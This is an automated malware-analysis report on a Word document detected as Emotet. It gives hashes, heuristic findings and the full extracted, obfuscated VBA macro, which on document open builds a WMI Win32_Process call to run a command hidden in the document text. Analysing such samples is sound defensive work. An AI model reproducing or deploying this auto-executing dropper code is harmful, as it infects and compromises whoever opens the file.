Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 b793e4a37777e216…

MALICIOUS

Office (OLE) / .DOC

Size: 133.5 KB
Created: 2020-10-14 15:28:00
Authoring application: Microsoft Office Word
First seen: 2026-06-26
MD5: 74654257c09adf1eb6fe670c3f6ffbfb
SHA-1: 69ec1f5c67c4c8259e292a429951ae86a2af89f3
SHA-256: b793e4a37777e216cd8f84e2831e9142fa4994af300c251cd828c2f1008329e5
Risk score: 172

Heuristics (7)

  • ClamAV: Doc.Malware.Emotet-9777973-1 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Emotet-9777973-1
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS, 3 related findings)
    Document contains VBA macro code
  • CreateObject call (severity: high, rule: OLE_VBA_CREATEOBJ)
    Matched line in script:
    Set N_9qb2sxwkm = CreateObject(I_x55r1rwdpbsw_a)
  • VBA p-code auto-exec with execution tokens (severity: high, rule: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; the pairing is what flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro (severity: low, rule: OLE_VBA_DOCOPEN)
    Matched line in script:
    Private Sub Document_open()
  • Suspicious extracted artifact (severity: info, rule: EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (severity: info, rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 9715 bytes
SHA-256: 9e027f2406dbf600081423755bad65268b2cef37b5adb7a79b070c72ddd5d020
Detection:
  ClamAV: No threats found
  Obfuscation or payload: likely
  70 of 134 identifiers look randomly generated (e.g. 'L3rbvh_1kgr_3tdxtb'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Znijog1trmkmi"
Function F4_03bjrry3or1n(Vum2asv7sthtfnmwx0)
On Error Resume Next
   Dim ENgFEB()
ReDim ENgFEB(1)
ENgFEB(0) = 2 + 3
Dim uqVMIKBJ()
ReDim uqVMIKBJ(1)
uqVMIKBJ(0) = 440 + 2463
Dim SwVqBD()
ReDim SwVqBD(2)
SwVqBD(0) = 4 + 74781
SwVqBD(1) = 8 + 1
F4_03bjrry3or1n = Join(Vum2asv7sthtfnmwx0, Zwe7fd_qm4vmqe4m)
   Dim LUPFA()
ReDim LUPFA(1)
LUPFA(0) = 3 + 138
Dim nvZoAZY()
ReDim nvZoAZY(3)
nvZoAZY(0) = 45 + 51
nvZoAZY(1) = 18 + 11
nvZoAZY(2) = 2 + 5
Dim fMhxLCYE()
ReDim fMhxLCYE(3)
fMhxLCYE(0) = 33 + 31
fMhxLCYE(1) = 416 + 501
fMhxLCYE(2) = 8066 + 4
End Function
Function N_9qb2sxwkm(I_x55r1rwdpbsw_a)
On Error Resume Next
   Dim NaMiJEH()
ReDim NaMiJEH(3)
NaMiJEH(0) = 8980 + 61
NaMiJEH(1) = 5 + 61
NaMiJEH(2) = 5 + 3514
Dim iBWhS()
ReDim iBWhS(2)
iBWhS(0) = 5 + 61
iBWhS(1) = 7 + 91
Dim xCKvDACA()
ReDim xCKvDACA(3)
xCKvDACA(0) = 5 + 81
xCKvDACA(1) = 536 + 11
xCKvDACA(2) = 6 + 3596
Set N_9qb2sxwkm = CreateObject(I_x55r1rwdpbsw_a)
   Dim VGMvJJBf()
ReDim VGMvJJBf(2)
VGMvJJBf(0) = 26 + 44851
VGMvJJBf(1) = 7 + 9
Dim dZGFECsF()
ReDim dZGFECsF(3)
dZGFECsF(0) = 4 + 291
dZGFECsF(1) = 2 + 601
dZGFECsF(2) = 7 + 8
Dim sAaeICS()
ReDim sAaeICS(1)
sAaeICS(0) = 661 + 952
End Function
Function Apilvp9e1mn8l(Bgwhviawrvfbs2vw6)
On Error Resume Next
   Dim UKSifOdI()
ReDim UKSifOdI(1)
UKSifOdI(0) = 1574 + 691
Dim ONpPI()
ReDim ONpPI(1)
ONpPI(0) = 78 + 8
Dim MkkQH()
ReDim MkkQH(2)
MkkQH(0) = 7 + 81
MkkQH(1) = 6 + 8
Apilvp9e1mn8l = Split(Bgwhviawrvfbs2vw6, "=EGR")
   Dim vkwno()
ReDim vkwno(3)
vkwno(0) = 7170 + 1701
vkwno(1) = 703 + 54501
vkwno(2) = 4 + 6
Dim hpPCIfIdA()
ReDim hpPCIfIdA(2)
hpPCIfIdA(0) = 951 + 221
hpPCIfIdA(1) = 563 + 8033
Dim uFglFJGz()
ReDim uFglFJGz(2)
uFglFJGz(0) = 170 + 41
uFglFJGz(1) = 2 + 1
End Function

Attribute VB_Name = "Wtjfn_0g4qan4sf"
Attribute VB_Base = "0{8C441DB7-AB91-431C-9406-1B512FD9A931}{E77E4D53-9B7D-44A1-AA51-BCCE516683B9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function X8vfudkj36sp8()
On Error Resume Next
   Dim KEpfrIi()
ReDim KEpfrIi(3)
KEpfrIi(0) = 1 + 261
KEpfrIi(1) = 3245 + 31
KEpfrIi(2) = 7 + 1
Dim RIPSRJkJ()
ReDim RIPSRJkJ(2)
RIPSRJkJ(0) = 5 + 21
RIPSRJkJ(1) = 45 + 40
Dim rMtonRr()
ReDim rMtonRr(3)
rMtonRr(0) = 7 + 38981
rMtonRr(1) = 155 + 971
rMtonRr(2) = 2 + 2
J_nlq9yfu8htd = N_ov0lkhlprfzyhb + "=EGRro=EGR=EGRce=EGRs=EGRs=EGR" + L9sl8_sqonqoum_ku
   Dim XkjrylDoH()
ReDim XkjrylDoH(2)
XkjrylDoH(0) = 54 + 11
XkjrylDoH(1) = 3 + 84
Dim OSyeHUC()
ReDim OSyeHUC(2)
OSyeHUC(0) = 64 + 11
OSyeHUC(1) = 3556 + 4794
Dim vDoIJPuBz()
ReDim vDoIJPuBz(3)
vDoIJPuBz(0) = 4 + 71
vDoIJPuBz(1) = 2 + 51
vDoIJPuBz(2) = 9 + 4081
I7o24xkcuqtaxnppdo = Wu9xo2y8eho1 + "=EGR=EGR:=EGRw=EGRin=EGR=EGR3=EGR2=EGR_=EGR" + Zeooz1nxa8fv0642dr
   Dim kiIWpUE()
ReDim kiIWpUE(1)
kiIWpUE(0) = 2 + 1
Dim hRmoJHd()
ReDim hRmoJHd(2)
hRmoJHd(0) = 68 + 41011
hRmoJHd(1) = 425 + 9
Dim ZLyHhUBoP()
ReDim ZLyHhUBoP(2)
ZLyHhUBoP(0) = 5607 + 61
ZLyHhUBoP(1) = 9 + 7
Bgwhviawrvfbs2vw6 = Dtmr64u2x_7lcynqjg + "=EGR=EGRw=EGRi=EGRnm=EGR=EGRgm=EGRt=EGR=EGR" + Hugs6y4cp77fb1svqy
   Dim TVpgoY()
ReDim TVpgoY(3)
TVpgoY(0) = 571 + 71
TVpgoY(1) = 9 + 981
TVpgoY(2) = 620 + 5678
Dim oBYBJ()
ReDim oBYBJ(2)
oBYBJ(0) = 881 + 61
oBYBJ(1) = 4 + 27
Dim LVQNS()
ReDim LVQNS(2)
LVQNS(0) = 11 + 91
LVQNS(1) = 548 + 500
Upxwm87i42mh5j = Wtjfn_0g4qan4sf.Cpmcl8ozmbbkm__9.Pages(1).Caption
   Dim BAZqiA()
ReDim BAZqiA(3)
BAZqiA(0) = 5 + 5101
BAZqiA(1) = 184 + 31
BAZqiA(2) = 92 + 5585
Dim zHIzA()
ReDim zHIzA(3)
zHIzA(0) = 38 + 31
zHIzA(1) = 618 + 981
zHIzA(2) = 96 + 9
Dim bFYgGCAi()
ReDim bFYgGCAi(2)
bFYgGCAi(0) = 5554 + 361
bFYgGCAi(1) = 3 + 32
L3rbvh_1kgr_3tdxtb = Bgwhviawrvfbs2vw6 + Upxwm87i42mh5j + I7o24xkcuqtaxnppdo + Wtjfn_0g4qan4sf.Y5p2hejhd9135 + J_nlq9yfu8htd
   Dim TRlEDGN()
ReDim TRlEDGN(1)
TRlEDGN(0) = 8 + 2760
Dim qPCrG()
ReDim qPCrG(1)
qPCrG(0) = 321 + 97
Dim oXgoIBg()
ReDim oXgoIBg(2)
oXgoIBg(0) = 746 + 54811
oXgoIBg(1) = 1 + 9
Bdm0b4f5b9x6dc8 = X73i62ecogoc(L3rbvh_1kgr_3tdxtb)
   Dim gzBoIBCAB()
ReDim gzBoIBCAB(1)
gzBoIBCAB(0) = 951 + 9985
Dim ZpKkJBoH()
ReDim ZpKkJBoH(3)
ZpKkJBoH(0) = 467 + 41
ZpKkJBoH(1) = 33 + 11
ZpKkJBoH(2) = 53 + 525
Dim FGSzID()
ReDim FGSzID(1)
FGSzID(0) = 66 + 488
Set Mvjm_k2kfu7vvw = CreateObject(Bdm0b4f5b9x6dc8)
   Dim XXXIDIB()
ReDim XXXIDIB(1)
XXXIDIB(0) = 4 + 9
Dim CWRTS()
ReDim CWRTS(2)
CWRTS(0) = 493 + 381
CWRTS(1) = 8 + 2
Dim lXDdF()
ReDim lXDdF(1)
lXDdF(0) = 4 + 97
Vum2asv7sthtfnmwx0 = Nwf02xewd9vptveh + Bdm0b4f5b9x6dc8 + Upxwm87i42mh5j + Wtjfn_0g4qan4sf.Sw9eaedqfsb3t + Wtjfn_0g4qan4sf.Fqn9_7v0m3u1i
   Dim UIMICIaBF()
ReDim UIMICIaBF(3)
UIMICIaBF(0) = 3 + 91
UIMICIaBF(1) = 3554 + 61
UIMICIaBF(2) = 5 + 9
Dim QoJoZEI()
ReDim QoJoZEI(2)
QoJoZEI(0) = 4075 + 3811
QoJoZEI(1) = 85 + 3
Dim zBGhFTEF()
ReDim zBGhFTEF(2)
zBGhFTEF(0) = 9 + 51
zBGhFTEF(1) = 843 + 2
Set Ehmptdhe60ex = Xh6_tk2v0qyptvbaxh(Vum2asv7sthtfnmwx0 + Wtjfn_0g4qan4sf.Y5p2hejhd9135)
   Dim dKCpBE()
ReDim dKCpBE(3)
dKCpBE(0) = 29 + 71
dKCpBE(1) = 3 + 25181
dKCpBE(2) = 6 + 6065
Dim auHUCGBCe()
ReDim auHUCGBCe(3)
auHUCGBCe(0) = 2 + 41
auHUCGBCe(1) = 6458 + 91961
auHUCGBCe(2) = 17 + 1
Dim acClFBY()
ReDim acClFBY(2)
acClFBY(0) = 7102 + 5501
acClFBY(1) = 4 + 2
Ngxxpgaj50l3hb_l = Mid(CVar(Lbdzt_ageomrk56ke.Sections(1)), 5, Len(CVar(Lbdzt_ageomrk56ke.Sections(1))))
   Dim UvneE()
ReDim UvneE(2)
UvneE(0) = 4 + 8241
UvneE(1) = 9818 + 905
Dim rllxADIDb()
ReDim rllxADIDb(1)
rllxADIDb(0) = 8 + 37
Dim UVPDW()
ReDim UVPDW(3)
UVPDW(0) = 3959 + 81
UVPDW(1) = 159 + 7551
UVPDW(2) = 1975 + 84
   Dim BzeBSNF()
ReDim BzeBSNF(2)
BzeBSNF(0) = 2 + 51
BzeBSNF(1) = 555 + 8580
Dim AFLJbsB()
ReDim AFLJbsB(3)
AFLJbsB(0) = 1546 + 951
AFLJbsB(1) = 2 + 54951
AFLJbsB(2) = 583 + 1
Dim pyLNIDLGF()
ReDim pyLNIDLGF(2)
pyLNIDLGF(0) = 5 + 61
pyLNIDLGF(1) = 6 + 218
Mvjm_k2kfu7vvw.Create X73i62ecogoc(Ngxxpgaj50l3hb_l), Ybs5c1e7366vu, Ehmptdhe60ex
   Dim cRIEAAEgI()
ReDim cRIEAAEgI(2)
cRIEAAEgI(0) = 915 + 8121
cRIEAAEgI(1) = 506 + 1
Dim PlFnxpXEH()
ReDim PlFnxpXEH(2)
PlFnxpXEH(0) = 2 + 71
PlFnxpXEH(1) = 25 + 7
Dim vezqCbG()
ReDim vezqCbG(3)
vezqCbG(0) = 7597 + 91
vezqCbG(1) = 30 + 71
vezqCbG(2) = 3 + 7532
   Dim YqrFJLCF()
ReDim YqrFJLCF(2)
YqrFJLCF(0) = 5 + 24451
YqrFJLCF(1) = 807 + 76
Dim iNzhI()
ReDim iNzhI(2)
iNzhI(0) = 9 + 621
iNzhI(1) = 58 + 3
Dim YLXjmHHRn()
ReDim YLXjmHHRn(3)
YLXjmHHRn(0) = 3791 + 4241
YLXjmHHRn(1) = 43 + 51
YLXjmHHRn(2) = 4 + 3
End Function
Function Xh6_tk2v0qyptvbaxh(Aw04j9ga5y8mol)
On Error Resume Next
   Dim IbSGs()
ReDim IbSGs(2)
IbSGs(0) = 335 + 91
IbSGs(1) = 9 + 1
Dim APGOVIE()
ReDim APGOVIE(2)
APGOVIE(0) = 4 + 311
APGOVIE(1) = 6 + 2
Dim PjvcoAiH()
ReDim PjvcoAiH(1)
PjvcoAiH(0) = 1 + 94
Set Xh6_tk2v0qyptvbaxh = Znijog1trmkmi.N_9qb2sxwkm(X3wxmfvq61c + Aw04j9ga5y8mol + D5rmv8tgxpf5r7ad)
   Dim wutoDoA()
ReDim wutoDoA(3)
wutoDoA(0) = 3 + 1571
wutoDoA(1) = 757 + 61391
wutoDoA(2) = 161 + 3
Dim AGPsySjrR()
ReDim AGPsySjrR(1)
AGPsySjrR(0) = 7 + 480
Dim oPZPDMBFr()
ReDim oPZPDMBFr(3)
oPZPDMBFr(0) = 42 + 61
oPZPDMBFr(1) = 28 + 41651
oPZPDMBFr(2) = 3 + 28
Xh6_tk2v0qyptvbaxh. _
showwindow = Ukat5yx804b2sg33nw + Kqj0cnqsx4fqe + Mcqbgkg5pxdrpf + Jbek2zttl0fo + Ae4m9jaem1gl + Pax6v0ljj2b
   Dim KwUhGH()
ReDim KwUhGH(2)
KwUhGH(0) = 1111 + 41
KwUhGH(1) = 6307 + 26
Dim BIglrOI()
ReDim BIglrOI(3)
BIglrOI(0) = 927 + 64411
BIglrOI(1) = 197 + 54801
BIglrOI(2) = 8 + 247
Dim uWueFllH()
ReDim uWueFllH(1)
uWueFllH(0) = 71 + 3
End Function
Function X73i62ecogoc(Y15p3cfhci78rq)
On Error Resume Next
   Dim pTrhHN()
ReDim pTrhHN(2)
pTrhHN(0) = 9997 + 31651
pTrhHN(1) = 5 + 202
Dim WNipXLJ()
ReDim WNipXLJ(3)
WNipXLJ(0) = 3 + 5031
WNipXLJ(1) = 816 + 8861
WNipXLJ(2) = 9 + 9
Dim KudpECqAF()
ReDim KudpECqAF(3)
KudpECqAF(0) = 8 + 51
KudpECqAF(1) = 1 + 6101
KudpECqAF(2) = 3638 + 5
Hpiyo7_6sxq2 = (Y15p3cfhci78rq)
   Dim yNcNCEC()
ReDim yNcNCEC(2)
yNcNCEC(0) = 9866 + 8591
yNcNCEC(1) = 136 + 1
Dim RooHFpJ()
ReDim RooHFpJ(3)
RooHFpJ(0) = 1961 + 54861
RooHFpJ(1) = 7 + 471
RooHFpJ(2) = 155 + 95
Dim ujANoD()
ReDim ujANoD(3)
ujANoD(0) = 12 + 63931
ujANoD(1) = 397 + 9501
ujANoD(2) = 1 + 96
Qbij1bpl9ovcmk9 = Znijog1trmkmi.Apilvp9e1mn8l(Hpiyo7_6sxq2)
   Dim Ldxxy()
ReDim Ldxxy(1)
Ldxxy(0) = 1683 + 52
Dim UkXzrHfB()
ReDim UkXzrHfB(3)
UkXzrHfB(0) = 4 + 9391
UkXzrHfB(1) = 451 + 251
UkXzrHfB(2) = 7 + 79
Dim JxWJU()
ReDim JxWJU(2)
JxWJU(0) = 4047 + 91
JxWJU(1) = 6011 + 9507
Bejelo6zhyl5re5fku = Znijog1trmkmi.F4_03bjrry3or1n(Qbij1bpl9ovcmk9)
   Dim gdlKi()
ReDim gdlKi(3)
gdlKi(0) = 5325 + 7391
gdlKi(1) = 7 + 61
gdlKi(2) = 3462 + 5
Dim uRyTGXf()
ReDim uRyTGXf(1)
uRyTGXf(0) = 9 + 3
Dim KzgrG()
ReDim KzgrG(2)
KzgrG(0) = 3 + 911
KzgrG(1) = 2 + 76
X73i62ecogoc = Bejelo6zhyl5re5fku
   Dim eEdflKDWJ()
ReDim eEdflKDWJ(2)
eEdflKDWJ(0) = 9253 + 981
eEdflKDWJ(1) = 2 + 1879
Dim aozpM()
ReDim aozpM(2)
aozpM(0) = 2 + 91
aozpM(1) = 9 + 2
Dim xZCoCLGD()
ReDim xZCoCLGD(2)
xZCoCLGD(0) = 5525 + 3751
xZCoCLGD(1) = 57 + 971
End Function


Attribute VB_Name = "Lbdzt_ageomrk56ke"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Wtjfn_0g4qan4sf.X8vfudkj36sp8
End Sub